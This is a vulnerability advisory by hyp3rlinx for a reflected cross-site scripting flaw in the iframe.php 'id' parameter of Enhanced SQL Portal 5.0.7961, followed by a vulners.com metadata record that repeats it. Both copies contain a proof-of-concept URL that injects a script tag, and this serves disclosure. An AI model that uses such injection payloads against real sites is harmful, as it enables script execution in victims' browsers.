Description
[+] Credits: John Page ( hyp3rlinx )
[+] Domains: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-ENHSQLPORTAL0602.txt
Vendor:
www.eliacom.com
www.eliacom.com/mysql-gui-download.php
Product:
Enhanced SQL Portal 5.0.7961 web based MySQL administration application.
Advisory Information:
================================================
Enhanced SQL Portal 5.0.7961 XSS Vulnerability
Vulnerability Details:
=====================
iframe.php contains an XSS vulnerability
Exploit code(s):
===============
http://localhost/Enhanced_SQL_Portal_5.0.7961_05_06_2015/iframe.php?id="/><script>alert(666)</script>
Disclosure Timeline:
=========================================================
Vendor Notification: May 28, 2015
June 2, 2015 : Public Disclosure
Severity Level:
=========================================================
Med
Description:
==========================================================
Request Method(s):
[+] GET
Vulnerable Product:
[+] Enhanced SQL Portal 5.0.7961
Vulnerable Parameter(s):
[+] id
Affected Area(s):
[+] iframe
===============================================================
(hyp3rlinx)
{"id": "SECURITYVULNS:DOC:32185", "bulletinFamily": "software", "title": "Enhanced SQL Portal 5.0.7961 XSS Vulnerability", "description": "\r\n\r\n[+] Credits: John Page ( hyp3rlinx )\r\n\r\n[+] Domains: hyp3rlinx.altervista.org\r\n\r\n[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-ENHSQLPORTAL0602.txt\r\n\r\n\r\n\r\nVendor:\r\nwww.eliacom.com\r\nwww.eliacom.com/mysql-gui-download.php\r\n\r\n\r\n\r\nProduct:\r\nEnhanced SQL Portal 5.0.7961 web based MySQL administration application.\r\n\r\n\r\n\r\nAdvisory Information:\r\n================================================\r\nEnhanced SQL Portal 5.0.7961 XSS Vulnerability\r\n\r\n\r\n\r\n\r\nVulnerability Details:\r\n=====================\r\niframe.php contains an XSS vulnerability\r\n\r\n\r\n\r\nExploit code(s):\r\n===============\r\n\r\n\r\nhttp://localhost/Enhanced_SQL_Portal_5.0.7961_05_06_2015/iframe.php?id="/><script>alert(666)</script>\r\n \r\n\r\n\r\nDisclosure Timeline:\r\n=========================================================\r\n\r\n\r\nVendor Notification: May 28, 2015\r\nJune 2, 2015 : Public Disclosure\r\n\r\n\r\nSeverity Level:\r\n=========================================================\r\nMed\r\n\r\n\r\n\r\nDescription:\r\n==========================================================\r\n\r\nRequest Method(s):\r\n [+] GET\r\n\r\nVulnerable Product:\r\n [+] Enhanced SQL Portal 5.0.7961 \r\n\r\nVulnerable Parameter(s):\r\n [+] id\r\n\r\nAffected Area(s):\r\n [+] iframe\r\n\r\n===============================================================\r\n\r\n(hyp3rlinx)\r\n\r\n", "published": "2015-06-08T00:00:00", "modified": "2015-06-08T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32185", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:59", "edition": 1, "viewCount": 11, "enchantments": {"score": {"value": -0.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14523"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14523"]}]}, "exploitation": null, "vulnersScore": -0.3}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645317814, "score": 1659803227}, "_internal": {"score_hash": "0aa465a9e97ff64c9a1a24d48ae13e82"}}
{}
Enhanced SQL Portal 5.0.7961 XSS Vulnerability